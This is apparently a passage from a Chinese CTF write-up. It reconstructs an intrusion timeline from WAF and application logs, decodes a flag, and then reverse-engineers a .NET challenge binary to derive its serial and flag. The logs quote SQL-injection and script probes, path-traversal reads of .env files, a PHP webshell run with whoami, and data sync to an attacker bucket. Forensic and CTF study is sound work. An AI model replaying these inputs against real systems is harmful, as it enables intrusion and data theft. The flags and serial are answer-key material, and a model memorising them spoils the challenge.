\u5e94\u7528\u5ba1\u8ba1\u65e5\u5fd7<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">logs\/auth.log Linux\/auth + Web \u767b\u5f55\u5ba1\u8ba1\u7247\u6bb5<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">logs\/waf.log JSON Lines WAF \u544a\u8b66\u65e5\u5fd7<\/p>\n<\/blockquote>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"1-\u566a\u58f0\u5206\u79bb\">1: \u566a\u58f0\u5206\u79bb<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">WAF \u65e5\u5fd7\u4e2d\u5927\u91cf\u6765\u81ea\u4e0d\u540c IP 
\u7684\u91cd\u590d\u653b\u51fb\u8f7d\u8377\uff08<code>\/wp-login.php<\/code>\u3001<code>\/robots.txt<\/code>\u3001<code>\/comment?msg=&lt;script&gt;<\/code>\u3001<code>\/search?q='or'1'='1<\/code>\uff09\u5c5e\u4e8e\u81ea\u52a8\u5316\u626b\u63cf\u5668\u566a\u58f0\uff0c\u5747\u88ab block\u3002auth.log \u4e2d\u7684 SSH \u7206\u7834\u540c\u7406\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u771f\u6b63\u7ed5\u8fc7 WAF \u7684\u653b\u51fb\u6d41\u7279\u5f81\uff1aWAF action \u4e3a <code>allow<\/code>\uff08\u975e <code>block<\/code>\uff09\uff0c\u4e14 app.log \u4e2d\u51fa\u73b0\u5bf9\u5e94\u7684 <code>forensic_phase<\/code> \u548c <code>checkpoint<\/code> \u5b57\u6bb5\u3002 \u5feb\u901f\u5b9a\u4f4d\uff1a\u627e\u51fa WAF \u653e\u884c\u7684\u653b\u51fb<code>grep '\"action\":\"allow\"' logs\/waf.log<\/code> \u627e\u51fa\u5305\u542b forensic \u6807\u8bb0\u7684 app \u65e5\u5fd7<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><code>grep 'forensic_phase' logs\/app.log<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5173\u952e\u53d1\u73b0 \u2014 \u653b\u51fb\u8005 IP <code>203.0.113.45<\/code> \u662f\u552f\u4e00\u540c\u65f6\u51fa\u73b0\u5728 WAF allow\u3001app.log forensic \u6807\u8bb0\u3001auth.log \u767b\u5f55\u4e8b\u4ef6\u4e2d\u7684 IP\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"2-\u653b\u51fb\u94fe\u65f6\u95f4\u7ebf\u8fd8\u539f-\u6b64\u5904\u4e3a\u4e86\u65b9\u4fbf-\u7528ai\u8fdb\u884c\u65f6\u95f4\u7ebf\u6eaf\u6e90\">2: \u653b\u51fb\u94fe\u65f6\u95f4\u7ebf\u8fd8\u539f\uff08\u6b64\u5904\u4e3a\u4e86\u65b9\u4fbf\uff0c\u7528ai\u8fdb\u884c\u65f6\u95f4\u7ebf\u6eaf\u6e90\uff09<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u4ee5 <code>203.0.113.45<\/code> \u4e3a pivot\uff0c\u5173\u8054\u56db\u4efd\u65e5\u5fd7\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\n    02:13:04  \u4fa6\u67e5    GET \/.env \u2192 404                    WAF: ENUM-404-BURST\n    02:13:46  \u4fa6\u67e5    GET \/backup\/config.old \u2192 404        WAF: ENUM-404-BURST\n    02:14:40  LFI     GET 
\/download?file=..\/..\/..\/..\/     WAF: LFI-930100 ALLOW\n                      var\/www\/app\/.env \u2192 200              &#91;phase 1]\n    02:15:37  LFI     GET \/download?file=..\/..\/..\/..\/     WAF: LFI-930100 ALLOW\n                      var\/log\/nginx\/access.log \u2192 200      &#91;phase 2]\n    02:17:05  \u767b\u5f55    POST \/login admin \u2192 401             auth: Failed password\n                      (bad_password)\n    02:17:26  \u767b\u5f55    POST \/login admin \u2192 302           auth: Accepted web-login\n                      (remember_token \u51ed\u636e\u590d\u7528)             &#91;phase 3]\n    02:19:07  \u4e0a\u4f20    POST \/admin\/plugin\/upload           WAF: PHP-UPLOAD ALLOW\n                      q2_report.php \u2192 201                 &#91;phase 4]\n    02:19:55  RCE     GET \/uploads\/.cache\/report.php      WAF: CMD-INJECTION BLOCK\n                      ?x=whoami \u2192 200, exit_code=0         (\u6267\u884c\u5df2\u5b8c\u6210)\n    02:21:30  \u7a83\u53d6    admin_export users \u2192 87391 bytes    IP \u5207\u6362: 198.51.100.211\n                                                           &#91;phase 5]\n    02:22:46  \u5916\u4f20    backup_sync \u2192 s3:\/\/night-archive    SESSION-IP-CHANGE \u544a\u8b66\n                                                           &#91;phase 6]\n    02:23:45  \u6e05\u75d5    admin_audit_download 4312 rows      &#91;phase 7]<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u653b\u51fb\u94fe\u603b\u7ed3\uff1a \u4fa6\u67e5\u63a2\u6d4b \u2192 \u8def\u5f84\u7a7f\u8d8a\u8bfb .env \u2192 \u7a83\u53d6 remember_token \u2192 \u7ba1\u7406\u5458\u767b\u5f55 \u2192 \u4e0a\u4f20 PHP Webshell \u2192 RCE \u6267\u884c whoami \u2192 \u5207\u6362 IP \u5bfc\u51fa\u7528\u6237\u6570\u636e \u2192 \u540c\u6b65\u81f3\u653b\u51fb\u8005 S3 \u2192 \u4e0b\u8f7d\u5ba1\u8ba1\u65e5\u5fd7\u6e05\u9664\u75d5\u8ff9<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"3-flag-\u89e3\u7801\">3: Flag \u89e3\u7801<\/h4>\n\n\n\n<p 
class=\"wp-block-paragraph\">7 \u4e2a phase \u7684 base64 checkpoint \u6309\u5e8f\u62fc\u63a5\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    import base64\n\n    checkpoints = &#91;\n        \"TEhGTEFH\",   # phase 1\n        \"e2xvZ190\",   # phase 2\n        \"aW1lbGlu\",   # phase 3\n        \"ZV9pcF9j\",   # phase 4\n        \"aGFpbl83\",   # phase 5\n        \"YzkyYTRm\",   # phase 6\n        \"MX0=\",       # phase 7\n    ]\n\n    flag = \"\".join(base64.b64decode(c).decode() for c in checkpoints)\n    print(flag)<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u89e3\u7801\u8fc7\u7a0b\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th>Phase<\/th><th>Base64<\/th><th>Decode<\/th><\/tr><\/thead><tbody><tr><td>1<\/td><td><code>TEhGTEFH<\/code><\/td><td><code>LHFLAG<\/code><\/td><\/tr><tr><td>2<\/td><td><code>e2xvZ190<\/code><\/td><td><code>{log_t<\/code><\/td><\/tr><tr><td>3<\/td><td><code>aW1lbGlu<\/code><\/td><td><code>imelin<\/code><\/td><\/tr><tr><td>4<\/td><td><code>ZV9pcF9j<\/code><\/td><td><code>e_ip_c<\/code><\/td><\/tr><tr><td>5<\/td><td><code>aGFpbl83<\/code><\/td><td><code>hain_7<\/code><\/td><\/tr><tr><td>6<\/td><td><code>YzkyYTRm<\/code><\/td><td><code>c92a4f<\/code><\/td><\/tr><tr><td>7<\/td><td><code>MX0=<\/code><\/td><td><code>1}<\/code><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u5f97\u5230flag\">\u5f97\u5230Flag<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>LHFLAG{log_timeline_ip_chain_7c92a4f1}<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"\u9006\u5411\">\u9006\u5411<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"orbitgate\">OrbitGate<\/h3>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u5148\u522b\u6025\u7740 patch 
\u6210\u529f\u5206\u652f\u3002\u7a0b\u5e8f\u5728\u5931\u8d25\u548c\u6210\u529f\u8def\u5f84\u91cc\u90fd\u57cb\u4e86\u770b\u8d77\u6765\u50cf flag \u7684\u5b57\u7b26\u4e32\u3002<\/p>\n<\/blockquote>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u521d\u6b65\u5206\u6790\">\u521d\u6b65\u5206\u6790<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u9898\u76ee\u76ee\u5f55\u4e2d\u6709\u4e24\u4e2a\u5173\u952e\u6587\u4ef6\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>OrbitGate.exe<\/code><\/li>\n\n\n\n<li><code>OrbitGate.zip<\/code><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u538b\u7f29\u5305\u5185\u8fd8\u6709\u9898\u9762\u548c\u63d0\u793a\uff0c\u5176\u4e2d\u6700\u5173\u952e\u7684\u4e09\u6761\u4fe1\u606f\u662f\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u4e0d\u8981\u53ea patch \u6210\u529f\u5206\u652f\u3002<\/li>\n\n\n\n<li>\u8f93\u5165\u683c\u5f0f\u56fa\u5b9a\u4e3a <code>5<\/code> \u7ec4 <code>4<\/code> \u4f4d\u5341\u516d\u8fdb\u5236\u3002<\/li>\n\n\n\n<li>\u6062\u590d\u51fa <code>5<\/code> \u4e2a <code>16-bit<\/code> \u503c\u540e\uff0c\u6700\u540e\u8fd8\u6709\u4e00\u6b65\u57fa\u4e8e\u6ce8\u518c\u7801\u7684\u89e3\u5bc6\u3002<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4e09\u53e5\u5df2\u7ecf\u628a\u6574\u9053\u9898\u7684\u9aa8\u67b6\u8bb2\u900f\u4e86\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u5148\u8fc7\u683c\u5f0f\u6821\u9a8c\uff1b<\/li>\n\n\n\n<li>\u518d\u8fd8\u539f 5 \u4e2a <code>UInt16<\/code> \u7684\u6570\u5b66\u5173\u7cfb\uff1b<\/li>\n\n\n\n<li>\u6700\u540e\u518d\u7528\u8fd9 5 \u4e2a\u503c\u53bb\u89e3\u5bc6\u771f\u5b9e flag\u3002<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u8bc6\u522b\u7a0b\u5e8f\u7c7b\u578b\">\u8bc6\u522b\u7a0b\u5e8f\u7c7b\u578b<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u5bf9 <code>OrbitGate.exe<\/code> \u505a\u5b57\u7b26\u4e32\u63d0\u53d6\uff0c\u53ef\u4ee5\u5f88\u5feb\u770b\u5230\uff1a<\/p>\n\n\n\n<pre 
class=\"wp-block-code\"><code>    BSJB\n    v4.0.30319\n    mscorlib\n    System\n    GateChecks\n    EncryptedFlag\n    FakeTokens\n    ParseSerial\n    Verify\n    RecoverFlag<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u662f\u975e\u5e38\u6807\u51c6\u7684 .NET \u7a0b\u5e8f\u7279\u5f81\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e5f\u5c31\u662f\u8bf4\uff0c\u8fd9\u9898\u4e0d\u9700\u8981\u548c native \u58f3\u3001SEH\u3001\u53cd\u6c47\u7f16\u5bf9\u6297\u592a\u4e45\uff0c\u91cd\u70b9\u4f1a\u843d\u5728\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u8bfb\u53d6\u6258\u7ba1\u5143\u6570\u636e\uff1b<\/li>\n\n\n\n<li>\u679a\u4e3e\u7c7b\u578b\u3001\u5b57\u6bb5\u3001\u65b9\u6cd5\uff1b<\/li>\n\n\n\n<li>\u8fd8\u539f <code>Verify()<\/code> \u4e0e <code>RecoverFlag()<\/code> \u7684\u903b\u8f91\u3002<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fdb\u4e00\u6b65\u53cd\u5c04\u540e\uff0c\u53ef\u4ee5\u62ff\u5230\u6838\u5fc3\u6210\u5458\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    Fields:\n    - GateChecks : UInt16&#91;]\n    - EncryptedFlag : Byte&#91;]\n    - FakeTokens : String&#91;]\n\n    Methods:\n    - LooksLikeLicense\n    - ParseSerial\n    - Verify\n    - RecoverFlag\n    - ComputeDigitChecksum\n    - Rol16\n    - Ror16<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u5230\u8fd9\u91cc\uff0c\u9898\u773c\u5df2\u7ecf\u5b8c\u5168\u66b4\u9732\u51fa\u6765\u4e86\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u8bef\u5bfc\u70b9\">\u8bef\u5bfc\u70b9<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u7a0b\u5e8f\u91cc\u6709\u4e00\u4e2a\u4e13\u95e8\u7684\u5047\u7ebf\u7d22\u6570\u7ec4 <code>FakeTokens<\/code>\uff0c\u5185\u5bb9\u5982\u4e0b\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    flag{telemetry_desync_is_not_enough}\n    flag{patching_only_gets_you_a_decoy}\n    OG-LAB-REVOKED-CHANNEL<\/code><\/pre>\n\n\n\n<p 
class=\"wp-block-paragraph\">\u8fd9\u4e24\u6761 <code>flag{...}<\/code> \u90fd\u5f88\u50cf\u771f flag\uff0c\u5c24\u5176\u7b2c\u4e8c\u6761\u51e0\u4e4e\u662f\u201c\u8d34\u8138\u5632\u8bbd\u201d\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f46\u5b83\u4eec\u6070\u597d\u4e5f\u5728\u63d0\u9192\u4f60\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u53ea\u9760 patch\uff0c\u4f1a\u62ff\u5230\u8bf1\u9975\uff1b<\/li>\n\n\n\n<li>\u53ea\u9760\u5b57\u7b26\u4e32\uff0c\u4f1a\u8d70\u8fdb\u9677\u9631\uff1b<\/li>\n\n\n\n<li>\u771f\u6b63\u7684\u51fa\u53e3\uff0c\u5728 <code>EncryptedFlag<\/code> \u548c <code>RecoverFlag()<\/code>\u3002<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4e5f\u662f\u672c\u9898\u8bbe\u8ba1\u6700\u6f02\u4eae\u7684\u5730\u65b9\u3002\u5b83\u4e0d\u662f\u5355\u7eaf\u201c\u9a97\u4f60\u201d\uff0c\u800c\u662f\u5728\u7528\u8bef\u5bfc\u53cd\u5411\u5f3a\u8c03\u9898\u76ee\u4e3b\u9898\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u7a0b\u5e8f\u4e3b\u6d41\u7a0b\">\u7a0b\u5e8f\u4e3b\u6d41\u7a0b<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u6574\u4f53\u903b\u8f91\u53ef\u4ee5\u6982\u62ec\u4e3a\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u7528 <code>LooksLikeLicense()<\/code> \u68c0\u67e5\u8f93\u5165\u683c\u5f0f\uff1b<\/li>\n\n\n\n<li>\u7528 <code>ParseSerial()<\/code> \u628a\u6ce8\u518c\u7801\u62c6\u6210 5 \u4e2a <code>UInt16<\/code>\uff1b<\/li>\n\n\n\n<li>\u7528 <code>Verify(words, serial)<\/code> \u6821\u9a8c\u8fd9 5 \u4e2a\u6570\u4e4b\u95f4\u7684\u5173\u7cfb\uff1b<\/li>\n\n\n\n<li>\u5982\u679c\u901a\u8fc7\uff0c\u5219\u8c03\u7528 <code>RecoverFlag(words)<\/code> \u89e3\u5bc6 <code>EncryptedFlag<\/code>\uff1b<\/li>\n\n\n\n<li>\u8f93\u51fa\u771f\u5b9e flag\u3002<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">\u5176\u4e2d\u683c\u5f0f\u8981\u6c42\u975e\u5e38\u76f4\u63a5\uff1a XXXX-XXXX-XXXX-XXXX-XXXX<\/p>\n\n\n\n<p 
class=\"wp-block-paragraph\">\u6bcf\u4e00\u7ec4\u90fd\u662f 4 \u4f4d\u5341\u516d\u8fdb\u5236\uff0c\u603b\u5171 5 \u7ec4\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u6838\u5fc3\u6821\u9a8c\u903b\u8f91\">\u6838\u5fc3\u6821\u9a8c\u903b\u8f91<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u9759\u6001\u5b57\u6bb5 <code>GateChecks<\/code> \u7684\u503c\u4e3a\uff1a<code>[33130, 108, 50732, 59120, 47103, 52012, 940]<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5c06\u6ce8\u518c\u7801\u62c6\u6210\uff1a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><code>w0, w1, w2, w3, w4<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><code>Verify()<\/code> \u4f1a\u5148\u6784\u9020\u4e00\u4e2a 7 \u9879\u6570\u7ec4\uff0c\u518d\u4e0e <code>GateChecks<\/code> \u505a\u7ec4\u5408\u6821\u9a8c\u3002\u5173\u952e\u7ea6\u675f\u53ef\u4ee5\u8fd8\u539f\u4e3a\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    check0 = Rol16(w0 ^ 0x1337, 3) + 0x2222\n    check1 = w1 ^ Ror16(w0, 1) ^ 0x5AA5\n    check2 = ((w2 + Rol16(w1, 4)) &amp; 0xFFFF) ^ 0x3141\n    check3 = (w3 - w2) ^ 0xBEEF\n    check4 = Rol16(w4, 7) + (w1 ^ 0x4242)\n    check5 = w0 + w2 + w4\n    check6 = ComputeDigitChecksum(serial) + 0x6D3A<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u6240\u6709\u7ed3\u679c\u90fd\u6309 <code>UInt16<\/code> \u5904\u7406\uff0c\u4e5f\u5c31\u662f\u6700\u7ec8\u53d6 <code>&amp; 0xFFFF<\/code>\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u524d\u4e94\u9879\u53ef\u4ee5\u76f4\u63a5\u53cd\u63a8\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    w0 = Ror16((GateChecks&#91;0] - 0x2222) &amp; 0xFFFF, 3) ^ 0x1337\n    w1 = GateChecks&#91;1] ^ Ror16(w0, 1) ^ 0x5AA5\n    w2 = ((GateChecks&#91;2] ^ Rol16(w1, 4)) - 0x3141) &amp; 0xFFFF\n    w3 = ((GateChecks&#91;3] ^ 0xBEEF) + w2) &amp; 0xFFFF\n    w4 = Ror16((GateChecks&#91;4] - (w1 ^ 0x4242)) &amp; 0xFFFF, 7)<\/code><\/pre>\n\n\n\n<p 
class=\"wp-block-paragraph\">\u7b97\u51fa\u6765\u5c31\u662f\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    w0 = 0x18DE\n    w1 = 0x56A6\n    w2 = 0x7B08\n    w3 = 0xD327\n    w4 = 0x3746<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e5f\u5c31\u662f\u5408\u6cd5\u6ce8\u518c\u7801\uff1a<code>18DE-56A6-7B08-D327-3746<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u518d\u9a8c\u8bc1\u4e00\u4e0b\uff1a<code>w0 + w2 + w4 = 0x18DE + 0x7B08 + 0x3746 = 0xCB2C<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u521a\u597d\u5bf9\u5e94\uff1a<code>GateChecks[5] = 52012 = 0xCB2C<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8bf4\u660e\u53cd\u63a8\u7ed3\u679c\u5b8c\u5168\u95ed\u5408\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u5173\u4e8e\u6700\u540e\u4e00\u5c42\">\u5173\u4e8e\u6700\u540e\u4e00\u5c42<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u771f\u6b63\u6709\u610f\u601d\u7684\u662f\uff0c<code>Verify()<\/code> \u901a\u8fc7\u5e76\u4e0d\u4ee3\u8868\u9898\u76ee\u7ed3\u675f\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u7a0b\u5e8f\u91cc\u8fd8\u6709\u4e00\u6bb5\u5b57\u8282\u6570\u7ec4\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    EncryptedFlag =\n    8E C4 C6 4D 06 92 77 48 BF 1C 1B D7 C3 85 9A 7F\n    6B E7 89 88 E7 DC 57 9D 4D 78 C9 FE 1E B8 BD 45 E9 EF 23<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u771f\u6b63\u7684 flag \u5e76\u4e0d\u5728\u5b57\u7b26\u4e32\u533a\uff0c\u800c\u662f\u5728\u8fd9\u91cc\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><code>RecoverFlag(words)<\/code> \u4f1a\u4f7f\u7528\u524d\u9762\u6062\u590d\u51fa\u7684 5 \u4e2a <code>UInt16<\/code> \u503c\uff0c\u6784\u9020\u4e00\u6761\u4e0e\u6ce8\u518c\u7801\u7ed1\u5b9a\u7684\u5b57\u8282\u6d41\uff0c\u5bf9 <code>EncryptedFlag<\/code> \u505a\u9010\u5b57\u8282\u89e3\u5bc6\uff0c\u6700\u540e\u518d\u6309 ASCII \u8f93\u51fa\u3002<\/p>\n\n\n\n<p 
class=\"wp-block-paragraph\">\u8fd9\u5c31\u89e3\u91ca\u4e86\u4e3a\u4ec0\u4e48\u5355\u7eaf patch \u6210\u529f\u5206\u652f\u4e0d\u591f\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u4f60\u53ef\u4ee5\u8ba9\u7a0b\u5e8f\u201c\u663e\u793a\u6210\u529f\u201d\uff1b<\/li>\n\n\n\n<li>\u4f46\u5982\u679c\u6ce8\u518c\u7801\u4e0d\u5408\u6cd5\uff0c\u771f\u6b63\u7684\u89e3\u5bc6\u8fc7\u7a0b\u5c31\u6ca1\u6709\u6b63\u786e\u8f93\u5165\uff1b<\/li>\n\n\n\n<li>\u6700\u7ec8\u62ff\u4e0d\u5230\u771f flag\u3002<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4e00\u6b65\u628a\u201c\u5f62\u5f0f\u4e0a\u7684\u901a\u8fc7\u201d\u548c\u201c\u903b\u8f91\u4e0a\u7684\u901a\u8fc7\u201d\u5f7b\u5e95\u533a\u5206\u5f00\u4e86\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u6c42\u89e3\u811a\u672c\">\u6c42\u89e3\u811a\u672c<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e0b\u9762\u7ed9\u51fa\u4e00\u4e2a\u8db3\u591f\u7b80\u6d01\u3001\u9002\u5408\u6bd4\u8d5b\u73b0\u573a\u590d\u73b0\u7684 Python \u7248\u672c\u6c42\u89e3\u811a\u672c\u3002\u5b83\u76f4\u63a5\u6839\u636e <code>GateChecks<\/code> \u53cd\u63a8 5 \u4e2a <code>16-bit<\/code> \u503c\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    def rol16(x, s):\n        s &amp;= 15\n        return ((x &lt;&lt; s) | (x &gt;&gt; (16 - s))) &amp; 0xFFFF\n    def ror16(x, s):\n        s &amp;= 15\n        return ((x &gt;&gt; s) | (x &lt;&lt; (16 - s))) &amp; 0xFFFF\n\n\n    gate = &#91;33130, 108, 50732, 59120, 47103, 52012, 940]\n\n    w0 = ror16((gate&#91;0] - 0x2222) &amp; 0xFFFF, 3) ^ 0x1337\n    w1 = gate&#91;1] ^ ror16(w0, 1) ^ 0x5AA5\n    w2 = ((gate&#91;2] ^ rol16(w1, 4)) - 0x3141) &amp; 0xFFFF\n    w3 = ((gate&#91;3] ^ 0xBEEF) + w2) &amp; 0xFFFF\n    w4 = ror16((gate&#91;4] - (w1 ^ 0x4242)) &amp; 0xFFFF, 7)\n\n    serial = f\"{w0:04X}-{w1:04X}-{w2:04X}-{w3:04X}-{w4:04X}\"\n    print(serial)<\/code><\/pre>\n\n\n\n<p 
class=\"wp-block-paragraph\">\u8f93\u51fa\uff1a <code>18DE-56A6-7B08-D327-3746<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5c06\u8be5\u5b57\u7b26\u4e32\u8f93\u5165\u7a0b\u5e8f\uff0c\u5373\u53ef\u5f97\u5230\u771f\u5b9e flag\u3002<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u8fd0\u884c\u7ed3\u679c\">\u8fd0\u884c\u7ed3\u679c<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u7a0b\u5e8f\u63a5\u53d7\u6b63\u786e\u6ce8\u518c\u7801\u540e\u7684\u8f93\u51fa\u4e3a\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>    &#91;+] Uplink accepted.\n    &#91;+] Orbital maintenance channel restored.\n    &#91;+] flag{4c731fc9bdfd9b15_orbit_unlock}<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u56e0\u6b64\u6700\u7ec8\u7b54\u6848\u4e3a\uff1a<code>flag{4c731fc9bdfd9b15_orbit_unlock}<\/code><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"\u590d\u76d8\">\u590d\u76d8<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u9898\u7684\u96be\u70b9\u4ece\u6765\u4e0d\u5728\u201c\u7b97\u672f\u6709\u591a\u96be\u201d\uff0c\u800c\u5728\u201c\u4f60\u662f\u5426\u613f\u610f\u5c0a\u91cd\u7a0b\u5e8f\u672c\u8eab\u7684\u903b\u8f91\u201d\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679c\u53ea\u60f3\u8d70\u6377\u5f84\uff0c\u5f88\u5bb9\u6613\u505c\u5728\u4e0b\u9762\u8fd9\u4e9b\u5047\u7ec8\u70b9\u4e0a\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u770b\u5230 <code>flag{...}<\/code> \u5b57\u7b26\u4e32\u5c31\u63d0\u4ea4\uff1b<\/li>\n\n\n\n<li>patch \u6761\u4ef6\u8df3\u8f6c\u8ba9\u7a0b\u5e8f\u663e\u793a\u6210\u529f\uff1b<\/li>\n\n\n\n<li>\u53ea\u6062\u590d\u524d\u534a\u6bb5\u7ea6\u675f\uff0c\u4e0d\u53bb\u770b\u6700\u540e\u7684\u89e3\u5bc6\u6d41\u7a0b\u3002<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f46\u8fd9\u9898\u771f\u6b63\u8003\u5bdf\u7684\u662f\u53e6\u4e00\u4ef6\u4e8b\uff1a<\/p>\n\n\n\n<blockquote 
class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">Reverse \u4e0d\u662f\u628a\u7a0b\u5e8f\u6539\u6210\u4f60\u60f3\u770b\u5230\u7684\u6837\u5b50\u3002Reverse \u662f\u7406\u89e3\u5b83\u4e3a\u4ec0\u4e48\u4f1a\u53d8\u6210\u90a3\u4e2a\u6837\u5b50\u3002<\/p>\n<\/blockquote>\n\n\n\n<p class=\"wp-block-paragraph\">\u4ece\u8fd9\u4e2a\u89d2\u5ea6\u8bf4\uff0c<code>OrbitGate<\/code> \u662f\u4e00\u9053\u5b8c\u6210\u5ea6\u5f88\u9ad8\u7684\u9898\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u7ed3\u6784\u77ed\u5c0f\uff1b<\/li>\n\n\n\n<li>\u63d0\u793a\u660e\u786e\uff1b<\/li>\n\n\n\n<li>\u8bef\u5bfc\u6709\u6548\u4f46\u4e0d\u8fc7\u5206\uff1b<\/li>\n\n\n\n<li>\u89e3\u9898\u8def\u5f84\u5e72\u51c0\uff1b<\/li>\n\n\n\n<li>\u4e3b\u9898\u8868\u8fbe\u5b8c\u6574\u3002<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u5b83\u544a\u8bc9\u6211\u4eec\uff0c\u771f\u6b63\u7684\u201c\u901a\u8fc7\u9a8c\u8bc1\u201d\uff0c\u4e0d\u662f\u4f2a\u9020\u6210\u529f\u5206\u652f\uff0c\u800c\u662f\u6784\u9020\u51fa\u4e00\u628a\u80fd\u8ba9\u6574\u4e2a\u7cfb\u7edf\u81ea\u7136\u8fd0\u8f6c\u7684\u94a5\u5319\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u628a\u94a5\u5319\u5c31\u662f\uff1a 18DE-56A6-7B08-D327-3746<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\" 